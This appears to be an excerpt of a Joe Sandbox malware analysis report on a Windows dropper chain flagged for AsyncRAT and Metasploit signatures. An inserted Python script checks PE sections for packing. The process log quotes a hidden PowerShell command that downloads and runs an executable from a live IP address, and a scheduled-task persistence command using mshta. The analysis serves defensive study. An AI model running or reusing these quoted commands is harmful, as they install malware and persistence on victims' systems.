Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_049343C8 7_2_049343C8
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_0493CCB8 7_2_0493CCB8
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_0493AF18 7_2_0493AF18
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_04939A2E 7_2_04939A2E
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_0493DA60 7_2_0493DA60
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_0493DA68 7_2_0493DA68
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_04993A08 7_2_04993A08
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_049903D8 7_2_049903D8
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_049915E0 7_2_049915E0
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_049906FF 7_2_049906FF
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_0609F818 7_2_0609F818
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_0609F540 7_2_0609F540
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_0609E500 7_2_0609E500
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F18060 8_2_00F18060
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F82046 8_2_00F82046
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F78298 8_2_00F78298
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F4E4FF 8_2_00F4E4FF
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F4676B 8_2_00F4676B
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00FA4873 8_2_00FA4873
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F1CAF0 8_2_00F1CAF0
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F3CAA0 8_2_00F3CAA0
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F2CC39 8_2_00F2CC39
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F46DD9 8_2_00F46DD9
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F191C0 8_2_00F191C0
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F2B119 8_2_00F2B119
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F31394 8_2_00F31394
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F31706 8_2_00F31706
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F3781B 8_2_00F3781B
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F319B0 8_2_00F319B0
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F2997D 8_2_00F2997D
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F17920 8_2_00F17920
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F37A4A 8_2_00F37A4A
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F37CA7 8_2_00F37CA7
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F31C77 8_2_00F31C77
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F49EEE 8_2_00F49EEE
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F9BE44 8_2_00F9BE44
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F31F32 8_2_00F31F32
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Code function: 30_2_0040737E 30_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Code function: 30_2_00406EFE 30_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Code function: 30_2_004079A2 30_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Code function: 30_2_004049A8 30_2_004049A8
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: String function: 00F30A30 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: String function: 00F2F9F2 appears 31 times
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: DhqvS8pXj8.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000003F.00000002.2927763179.000000000A17E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: DhqvS8pXj8.exe Static PE information: Section: fsnlaalu ZLIB complexity 0.9941688544489612
Source: skotes.exe.0.dr Static PE information: Section: fsnlaalu ZLIB complexity 0.9941688544489612
Source: random[2].exe.6.dr Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: 1e8dfbd5c2.exe.6.dr Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: random[1].exe.6.dr Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: 5d2afc26b8.exe.6.dr Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: random[2].exe1.6.dr Static PE information: Section: ZLIB complexity 0.996481948757764
Source: random[2].exe1.6.dr Static PE information: Section: voasjcay ZLIB complexity 0.9943484166047548
Source: d895046020.exe.6.dr Static PE information: Section: ZLIB complexity 0.996481948757764
Source: d895046020.exe.6.dr Static PE information: Section: voasjcay ZLIB complexity 0.9943484166047548
Source: random[1].exe1.6.dr Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: dc785309cb.exe.6.dr Static PE information: Section: .reloc ZLIB complexity 1.002685546875
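The "ZLIB complexity" figures above are the ratio of deflate output to section size. Values at or just above 1.0 (the .rdata and .reloc entries, and the oddly named fsnlaalu and voasjcay sections at 0.99) mean the bytes could not be compressed at all, which is what an encrypted or packed payload looks like; a normal code or data section compresses noticeably. The script below reproduces that check on a PE section table with only the Python standard library. It is an added example, not Joe Sandbox's implementation. The threshold of 0.95 and the list of linker-standard section names are assumptions, and the demo PE it builds is a synthetic, non-loadable file whose COFF characteristics (0x0102 = EXECUTABLE_IMAGE | 32BIT_MACHINE) and section name mirror what the report lists for the sample.

```python
import hashlib
import struct
import sys
import zlib

SECTION_HEADER_SIZE = 40
# Names a linker normally emits (assumed list); anything else (fsnlaalu, voasjcay, ...) deserves a look.
STANDARD_SECTION_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                          ".edata", ".pdata", ".bss", ".tls", ".CRT", ".textbss"}


def zlib_complexity(raw: bytes) -> float:
    """Deflate output size over input size, the statistic the report calls 'ZLIB complexity'.
    Already-compressed or encrypted data cannot shrink, so it lands at or just above 1.0
    (deflate falls back to stored blocks and adds a few bytes of framing)."""
    if not raw:
        return 0.0
    return len(zlib.compress(raw, 9)) / len(raw)


def parse_sections(pe: bytes) -> list:
    """Walk the COFF section table of a PE image using only the standard library."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    size_of_optional = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 4 + 20 + size_of_optional  # signature + COFF header + optional header
    sections = []
    for i in range(num_sections):
        off = table + i * SECTION_HEADER_SIZE
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, off)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize, "raw_size": raw_size,
            "zlib_complexity": zlib_complexity(raw),
        })
    return sections


def flag_packed_sections(sections, threshold: float = 0.95) -> list:
    """Sections whose bytes are essentially incompressible: packed or encrypted payload candidates."""
    return [s["name"] for s in sections if s["raw_size"] and s["zlib_complexity"] >= threshold]


def nonstandard_names(sections) -> list:
    return [s["name"] for s in sections if s["name"] not in STANDARD_SECTION_NAMES]


def _incompressible(n: int, seed: bytes = b"demo") -> bytes:
    """Deterministic pseudo-random bytes (SHA-256 counter stream) standing in for a packed payload."""
    out = bytearray()
    for counter in range((n + 31) // 32):
        out += hashlib.sha256(seed + counter.to_bytes(4, "little")).digest()
    return bytes(out[:n])


def build_demo_pe() -> bytes:
    """Assumption: a synthetic, non-loadable PE is enough to exercise the parser.
    Two sections: a compressible '.text' and an incompressible 'fsnlaalu' (the name from the report)."""
    sections = [(b".text", b"\x90" * 4096), (b"fsnlaalu", _incompressible(4096))]
    e_lfanew, size_of_optional = 0x40, 0
    headers_len = e_lfanew + 4 + 20 + size_of_optional + SECTION_HEADER_SIZE * len(sections)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine=i386, NumberOfSections, timestamp, symtab ptr, nsyms, SizeOfOptionalHeader,
    # Characteristics=0x0102 (EXECUTABLE_IMAGE | 32BIT_MACHINE, as the report lists for the sample)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_of_optional, 0x0102)
    table, body, raw_ptr = b"", b"", headers_len
    for i, (name, data) in enumerate(sections):
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, relocs, linenums,
        # NumberOfRelocations, NumberOfLinenumbers, Characteristics (code | execute | read)
        table += struct.pack("<8sIIIIIIHHI", name, len(data), 0x1000 * (i + 1), len(data),
                             raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += data
        raw_ptr += len(data)
    return dos + b"PE\0\0" + coff + table + body


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_demo_pe()
    secs = parse_sections(data)
    for s in secs:
        print(f"{s['name']:<10} raw={s['raw_size']:>8}  zlib_complexity={s['zlib_complexity']:.4f}")
    print("packed candidates:", flag_packed_sections(secs))
    print("non-standard names:", nonstandard_names(secs))
```

Run it against a real dropped file with `python pe_sections.py sample.exe`; without an argument it analyses the synthetic PE. Treat the result as a triage signal, not a verdict: legitimately signed installers also carry incompressible resource or overlay data, so combine it with the non-standard name check and the unpacking signatures the report already raises.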
Source: random[2].exe.6.dr, gBMthepoZSL1ZVKpeA.cs Cryptographic APIs: 'CreateDecryptor'
Source: 1e8dfbd5c2.exe.6.dr, gBMthepoZSL1ZVKpeA.cs Cryptographic APIs: 'CreateDecryptor'
Source: random[1].exe.6.dr, PjMboxrZKVMRiayL4T.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5d2afc26b8.exe.6.dr, PjMboxrZKVMRiayL4T.cs Cryptographic APIs: 'CreateDecryptor'
Source: k6Sly2p.exe.6.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: k6Sly2p.exe.6.dr, -.cs Cryptographic APIs: 'CreateDecryptor'
Source: random[2].exe.6.dr, Program.cs Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: 1e8dfbd5c2.exe.6.dr, Program.cs Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: random[1].exe.6.dr, Program.cs Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: 5d2afc26b8.exe.6.dr, Program.cs Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@141/86@2/3
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F837B5 GetLastError,FormatMessageW, 8_2_00F837B5
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F710BF AdjustTokenPrivileges,CloseHandle, 8_2_00F710BF
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 8_2_00F716C3
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 8_2_00F851CD
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F9A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 8_2_00F9A67C
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F8648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 8_2_00F8648E
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 8_2_00F142A2
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Code function: 23_2_050A15D8 ChangeServiceConfigA, 23_2_050A15D8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k6Sly2p[1].exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1780:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4416:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2248:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:944:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2844:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_03
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: DhqvS8pXj8.exe ReversingLabs: Detection: 59%
Source: DhqvS8pXj8.exe Virustotal: Detection: 47%
Source: DhqvS8pXj8.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe File read: C:\Users\user\Desktop\DhqvS8pXj8.exe
Source: unknown Process created: C:\Users\user\Desktop\DhqvS8pXj8.exe "C:\Users\user\Desktop\DhqvS8pXj8.exe"
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe "C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe "C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe"
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" any_word
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE "C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE"
